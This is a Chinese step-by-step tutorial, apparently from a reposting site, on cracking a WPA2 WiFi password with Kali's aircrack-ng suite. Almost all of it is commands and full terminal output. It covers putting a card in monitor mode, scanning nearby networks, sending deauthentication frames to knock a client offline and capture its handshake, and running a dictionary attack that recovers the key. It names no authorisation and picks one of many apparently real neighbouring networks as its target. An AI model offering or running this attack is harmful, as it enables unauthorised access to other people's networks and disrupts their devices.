小白教程--- kali(po解)WIFI密码 (图文教程)

kali学得好,牢饭少不了!!!

原理:

模拟WiFi的已连接设备,强制让其下线重连,获取其握手包,使用密码字典(宝丽)婆洁。

环境(准备工作):

无线网卡:RT3070L

第一行信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb                             
Bus 002 Device 018: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

linux系统

┌──(root㉿kali)-[/home/kali]
└─# head -n 1 /etc/issue
Kali GNU/Linux Rolling \n \l
                                                                                                                                                           
┌──(root㉿kali)-[/home/kali]
└─# uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
                                                                                                                                                           
┌──(root㉿kali)-[/home/kali]
└─# uname -r
6.5.0-kali3-amd64

操作步骤:

步骤1:网卡连接虚拟机系统

网卡连接前 lsusb 查看连接信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

插上网卡后再次查看信息,确保网卡以连上

第一行就是连上的网卡

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 019: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

步骤2:查看网卡是否识别 

ifconfig -a

 如果出现 wlan0 则说明网卡已连接成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)
        RX packets 15228  bytes 22181855 (21.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1395  bytes 97861 (95.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 884  bytes 44240 (43.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 884  bytes 44240 (43.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4098<BROADCAST,MULTICAST>  mtu 1500
        ether 14:6b:9c:02:72:1a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤3:开启网卡监控

airmon-ng start wlan0
┌──(root㉿kali)-[/home/kali]
└─# airmon-ng start wlan0


PHY     Interface       Driver          Chipset

phy14   wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
                (mac80211 monitor mode vif enabled for [phy14]wlan0 on [phy14]wlan0mon)
                (mac80211 station mode vif disabled for [phy14]wlan0)

查看是否监控成功

ifconfig -a

如果出现wlan0mon则说明监控成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)
        RX packets 15228  bytes 22181855 (21.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1395  bytes 97861 (95.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 884  bytes 44240 (43.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 884  bytes 44240 (43.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 14-6B-9C-02-72-1A-00-62-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 3281  bytes 559070 (545.9 KiB)
        RX errors 0  dropped 3281  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤4:扫描附近WiFi

airodump-ng wlan0mon

扫描结果如下 ,确定需要破解的WiFi

本文以TP-LINK_97A4为例

 CH  4 ][ Elapsed: 1 min ][ 2024-06-08 01:49                                                                                                               
                                                                                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                           
                                                                                                                                                           
 10:63:4B:30:FD:67  -33       30        0    0  12  270   WPA2 CCMP   PSK  MERCURY_FD67                                                                    
 16:D8:64:51:4F:EE  -65       10        0    0   6  270   WPA2 CCMP   PSK  <length:  0>                                                                    
 F4:2A:7D:38:D5:15  -66        2        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_D502                                                                    
 14:D8:64:50:4F:EE  -66       17        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_4FEE                                                                    
 C8:75:F4:69:54:92  -56       26        0    0   6  324   WPA2 CCMP   PSK  CMCC-3u4g                                                                       
 24:69:68:76:97:A4  -37       38       22    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                    
 C0:A4:76:6A:05:EB  -55       23        0    0  11  360   WPA2 CCMP   PSK  CMCC-gURM                                                                       
 70:AF:6A:8C:45:08  -65        3        2    0  11  130   WPA2 CCMP   PSK  306                                                                             
 D4:84:09:38:2C:A2  -64       21        1    0  11  270   WPA2 CCMP   PSK  MERCURY_2CA2                                                                    
 24:CF:24:CD:E9:27  -59       20        0    0  10  130   WPA2 CCMP   PSK  cpdd                                                                            
 80:8B:1F:98:B2:60  -50       10        0    0   5  270   WPA2 CCMP   PSK  504                                                                             
 A4:A9:30:FA:FB:E5  -57       31       10    0   4  130   WPA2 CCMP   PSK  Xiaomi_FBE4                                                                     
 E0:EF:02:01:67:BD  -46       33        6    0   1  360   WPA2 CCMP   PSK  403*                                                                            
 80:6B:1F:00:26:23  -66       25        2    0   1  130   WPA2 CCMP   PSK  XJT-400M_2622                                                                   
 C8:BF:4C:95:CB:CF  -59       35        0    0   1  270   WPA2 CCMP   PSK  Xiaomi_43EF                                                                     
                                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         
                                                                                                                                                           
 24:69:68:76:97:A4  F2:E6:18:8D:02:54  -40    0 - 6      0        1                                                                                        
 24:69:68:76:97:A4  14:13:33:6C:12:9D  -44    0 - 1      0        3         TP-LINK_97A4                                                                   
 24:69:68:76:97:A4  76:82:DA:61:E7:B9  -54    1e- 1e     0       31                                                                                        
 80:8B:1F:98:B2:60  4A:A5:AA:BB:42:DD  -62    0 - 1e     0        6                                                                                        
 A4:A9:30:FA:FB:E5  C2:58:EB:56:AA:4A  -58    0 -24      0        2                                                                                        
 E0:EF:02:01:67:BD  F4:D6:20:92:04:42  -44    2e- 1e     0        7                                                                                        
 80:6B:1F:00:26:23  5C:D0:6E:DF:49:3A  -58    0 - 1e     0        4  

步骤5:命令行等待抓取握手包

airodump-ng -w ./GGX -c 6 --bssid 24:69:68:76:97:A4 wlan0mon -ignore-nefative-oneaa

c:指定信道,即步骤4扫描结果CH列内容

-w:指定抓去握手包的存放路径

–bssid:指定路由器的MAC,即步骤4扫描结果的第一列BSSID

需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数

抓取扫描结果,如下,当前WiFi有4台设备连接

 CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 36 s ][ 2024-06-08 01:57                                                                           
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       
                                                                                                                                                           
 24:69:68:76:97:A4  -37 100      377       51    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                
                                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         
                                                                                                                                                           
 24:69:68:76:97:A4  14:13:33:6C:12:9D  -34    0 - 1e     0       15         TP-LINK_97A4                                                                   
 24:69:68:76:97:A4  14:D1:69:11:A5:6C  -46    1e- 6      0       32                                                                                        
 24:69:68:76:97:A4  F2:E6:18:8D:02:54  -44    1e- 6      0       88                                                                                        
 24:69:68:76:97:A4  76:82:DA:61:E7:B9  -48    1e- 1e     1       73    

步骤6:抓取握手包

步骤5都界面不需要关闭,模拟期中一台设备,让其断线重连,抓取其握手包。

aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon

-0:代表攻击次数,以5次为例

-a:指定路由器的MAC

-c:指定客户机的MAC

└─# aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon
02:05:49  Waiting for beacon frame (BSSID: 24:69:68:76:97:A4) on channel 6
02:05:51  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [80|64 ACKs]
02:05:52  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [68|53 ACKs]
02:05:53  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [86|62 ACKs]
02:05:54  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [65|49 ACKs]
02:05:55  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [67|39 ACKs]

步骤7:抓取握手包结果

回到步骤5打开的终端,如果出现handshake,则说明握手包抓取成功,

如果抓取失败,则模拟另外一台设备,重复步骤6


 CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 3 mins ][ 2024-06-08 02:08 ][ WPA handshake: 24:69:68:76:97:A4                                     
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       
                                                                                                                                                           
 24:69:68:76:97:A4  -42  96     1745     1577    2   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                
                                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         
                                                                                                                                                           
 24:69:68:76:97:A4  B0:D5:9D:6E:BF:48    1    1e- 1e     0       17                                                                                        
 24:69:68:76:97:A4  14:D1:69:11:A5:6C  -52    0 - 6      0        8                                                                                        
 24:69:68:76:97:A4  F2:E6:18:8D:02:54  -42    1e- 6      0       42                                                                                        
 24:69:68:76:97:A4  14:13:33:6C:12:9D  -28   11e- 5e    11     1437  EAPOL  TP-LINK_97A4                                                                   
 24:69:68:76:97:A4  76:82:DA:61:E7:B9  -52    1e-11e    18      833     

观察目录下是否生成文件

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs

步骤8:获取密码字典

此步骤非常重要,能否(婆洁)成功就看它了

可以通过某宝获取,或者是网络上搜索

一般购买无线网卡会赠送字典

步骤9:将密码字典拷贝至于握手包文件同一个路径

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs
-rw------- 1 kali kali      16391 Jun  2 10:46 wordlist.TXT

步骤10:保利婆洁WiFi密码

aircrack-ng -w wordlist.TXT GGX-0*

wordlist.TXT 是字典

婆洁成功界面,密码越简单越容易被婆洁

KEY FOUND!后面的就是密码

                               Aircrack-ng 1.7 

      [00:00:02] 2039/2109 keys tested (1269.26 k/s) 

      Time left: 0 seconds                                      96.68%

                           KEY FOUND! [ 123456 ]


      Master Key     : 97 77 C9 45 72 B4 90 9C 56 F7 22 AD F1 E0 8A DC 
                       E9 3F 7F 1D A1 D6 AE 79 89 D5 8A FE E1 95 FE 59 

      Transient Key  : 57 E3 41 E7 5A A3 C3 B2 30 09 17 7D 53 B1 60 BC 
                       05 17 02 B5 3C 78 10 5E 79 3C 81 8D A2 5B 94 C4 
                       08 1C DC EC 31 A2 32 6E 96 D9 C3 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 1C 9E F6 0D 9D 16 92 37 0D 90 6E 9B D9 03 7F B8 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/693348.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

计网仿真综合实验 实验十二

实验十二 综合网络实验 实验过程 IP配置说明参考连线配置OSPF使公司内部联通 路由器R1的OSPF配置路由器R2的OSPF配置路由器R3的OSPF配置R1、R2、R3的相关解释路由器R4的OSPF配置路由器R5的OSPF配置路由器R6的OSPF配置R4、R5、R6解释: 路由器R2的RIP配置路由器R7的RIP配置 总结 …

Unity DOTS技术(十五) 物理系统

要解决性能的瓶颈问题,在DOTS中我们将不再使用Unity自带的物理组件. 下面来分享一下在DOTS中当如何使用物理插件. 一.导入插件 在使用DOTS系创建的实体我们会发现,游戏物体无法受物理系统影响进行运动.于是我们需要添加物理系统插件. 1.打开Package Manager > 搜索插件Uni…

IT人的拖延——都是“分心”惹的祸?

典型表现 我们说到拖延的原因有很多&#xff0c;还有一个原因是因为“分心太多“造成的&#xff0c;分心太多的拖延大致上有以下表现&#xff1a; 无法集中注意力&#xff1a; 分心太多会导致我们无法集中注意力在当前的工作任务上&#xff0c;我们可能会经常性地走神或者在工…

你好GPT-4o——对GPT-4o发布的思考与看法

你好GPT-4o 前言 2024年5月13日&#xff0c;OpenAI官网发布了他们的新一代自然语言处理交互系统——GPT-4o。这是OpenAI继GPT4之后又一个新的旗舰模型。 GPT-4o&#xff08;“o”代表“omni”&#xff09;是迈向更自然的人机交互的一步——它接受文本、音频、图像和视频的任意…

Linux环境---在线安装MYSQL数据库

Linux环境—在线安装MYSQL数据库 一、使用步骤 1.安装环境 Mysql 驱动 8.0 需要 jdk1.8 才行。 JDK版本&#xff1a;1.8 参考文档 MYSQL版本&#xff1a;8.0.2 下载链接: https://pan.baidu.com/s/1MwXIilSL6EY3OuS7WtpySA?pwdg263 操作系统&#xff1a;CentOS 1.1 建立存…

Golang | Leetcode Golang题解之第133题克隆图

题目&#xff1a; 题解&#xff1a; func cloneGraph(node *Node) *Node {if node nil {return node}visited : map[*Node]*Node{}// 将题目给定的节点添加到队列queue : []*Node{node}// 克隆第一个节点并存储到哈希表中visited[node] &Node{node.Val, []*Node{}}// 广…

数据结构严蔚敏版精简版-栈和队列以及c语言代码实现

1栈的定义和特权 栈(stack)是限定仅在表尾进行插入或删除操作的线性表。 注&#xff1a;虽然说栈的实现就是一端插入和删除&#xff0c;但不一定是在“表尾”&#xff0c;这个“表尾”是广义的。 头插法实现链栈 尾插法实现链栈 因此&#xff0c;对栈来说&#xff0c;表尾…

从GAN到WGAN(01/2)

从GAN到WGAN 文章目录 一、说明二、Kullback-Leibler 和 Jensen-Shannon 背离三、生成对抗网络 &#xff08;GAN&#xff09;四、D 的最优值是多少&#xff1f;五、什么是全局最优&#xff1f;六、损失函数代表什么&#xff1f;七、GAN中的问题 一、说明 生成对抗网络 &#…

13_前端工程化_ES6

1.前端工程化概念 前端工程化是使用软件工程的方法来单独解决前端的开发流程中模块化、组件化、规范化、自动化的问题,其主要目的为了提高效率和降低成本。 前后端分离&#xff08;前端代码工程化独立出来形成一个单独的app&#xff09; 1.开发分离 2.部署分离 3.服务器分离…

012-Linux逻辑卷管理(LVM)

前言 安装 Linux 操作系统时遇到的⼀个常见的难以决定的问题就是如何正确地评估各分区大小&#xff0c;以分配合适的硬盘空间; 基本的磁盘分区管理方式在逻辑分区划分好之后就无法改变其大小。随着 Linux的逻辑卷管理功能的出现&#xff0c;这些问题都迎刃而解&#xff0c;用户…

如何计算 GPT 的 Tokens 数量?

基本介绍 随着人工智能大模型技术的迅速发展&#xff0c;一种创新的计费模式正在逐渐普及&#xff0c;即以“令牌”&#xff08;Token&#xff09;作为衡量使用成本的单位。那么&#xff0c;究竟什么是Token呢&#xff1f; Token 是一种将自然语言文本转化为计算机可以理解的…

论文阅读:All-In-One Image Restoration for Unknown Corruption

发表时间&#xff1a;2022 cvpr 论文地址&#xff1a;https://openaccess.thecvf.com/content/CVPR2022/papers/Li_All-in-One_Image_Restoration_for_Unknown_Corruption_CVPR_2022_paper.pdf 项目地址&#xff1a;https://github.com/XLearning-SCU/2022-CVPR-AirNet 在本文…

Word Split Line

Word Split Line 分割线 https://download.csdn.net/download/spencer_tseng/89413772

将字符串str1复制为字符串str2

定义两个字符数组str1和str2&#xff0c;再设两个指针变量p1和p2&#xff0c;分别指向两个字符数组中的有关字符&#xff0c;通过改变指针变量的值使它们指向字符串中的不同的字符&#xff0c;以实现字符的复制。编写程序&#xff1a; 运行程序&#xff1a; 程序分析&#xff1…

MySQL 与 PostgreSQL 关键对比二(SQL语法)

目录 1 详细示例 1.1自动增量列 1.2 字符串连接 1.3 JSON 支持 2 总结 MySQL 和 PostgreSQL 是两种流行的开源关系数据库管理系统&#xff08;RDBMS&#xff09;。尽管它们在许多方面相似&#xff0c;但在 SQL 语法和功能上存在一些显著差异。 以下SQL语句的执行如果需要开…

向量数据库是什么?

向量数据库是什么&#xff1f; 随着人工智能和机器学习技术的迅猛发展&#xff0c;向量数据库作为一种新型数据库引起了广泛关注。向量数据库专门用于存储和查询高维向量数据&#xff0c;是在大规模数据检索和相似性搜索领域的重要工具。 向量数据库的定义 向量数据库是一种…

SLAM小题目

1、最小二乘题目&#xff1a; 假设有三个WIFI热点&#xff0c;位置分别在(x1,y1), (x2,y2), (x3,y3), 移动端测量到每一个热点的距离L1,L2和L3&#xff0c;要求解移动端的位置. #include <iostream> #include <vector> #include <cmath> class Point { pub…

ssm601基于ssm框架的校园闲置物品交易平台+jsp【已测试】

前言&#xff1a;&#x1f469;‍&#x1f4bb; 计算机行业的同仁们&#xff0c;大家好&#xff01;作为专注于Java领域多年的开发者&#xff0c;我非常理解实践案例的重要性。以下是一些我认为有助于提升你们技能的资源&#xff1a; &#x1f469;‍&#x1f4bb; SpringBoot…

抓住时机的核心:坚持学习准备着

在这个快节奏的时代&#xff0c;时间对于每个人来说都是宝贵的。能否在合适的时间做正确的事情&#xff0c;往往决定了我们成功的概率。但同时&#xff0c;我们也要认识到&#xff0c;逆风翻盘虽少&#xff0c;却并非不可能。在这个过程中&#xff0c;投资自己&#xff0c;投资…

28-LINUX--I/O复用-epoll

一.epoll概述 epoll 是 Linux 特有的 I/O 复用函数。它在实现和使用上与 select、poll 有很大差异。首 先&#xff0c;epoll 使用一组函数来完成任务&#xff0c;而不是单个函数。其次&#xff0c;epoll 把用户关心的文件描述 符上的事件放在内核里的一个事件表中。从而无需像…